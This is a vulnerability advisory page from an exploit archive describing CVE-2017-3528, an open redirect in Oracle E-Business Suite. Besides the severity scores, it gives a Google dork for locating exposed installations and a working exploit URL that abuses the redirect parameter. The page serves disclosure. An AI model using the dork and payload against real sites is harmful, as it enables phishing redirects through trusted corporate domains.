Oracle E-Business Suite 12.1.3 / 12.2.x Open Redirect

2018.01.16
Credit: author
Risk: Low
Local: No
Remote: Yes
CWE: CWE-601


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: Oracle E-Business suite Open Redirect # Google Dork: inurl:OA_HTML/cabo/ # Date: April 2017 # Exploit Author: [author] # Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html # Software Link: [download link if available] # Version: Oracle E-Business Suite (REQUIRED) # Tested on: [relevant os] # CVE : CVE-2017-3528 The exploit can be leveraged for an open redirect using the following exploit path: https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com Oracle E-Business suite is vulnerable to an open redirect issue, specifically the redirect parameter allows any domain to be supplied and it will be rendered on the target's site. Note I was also credited for this CVE, see the Oracle CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top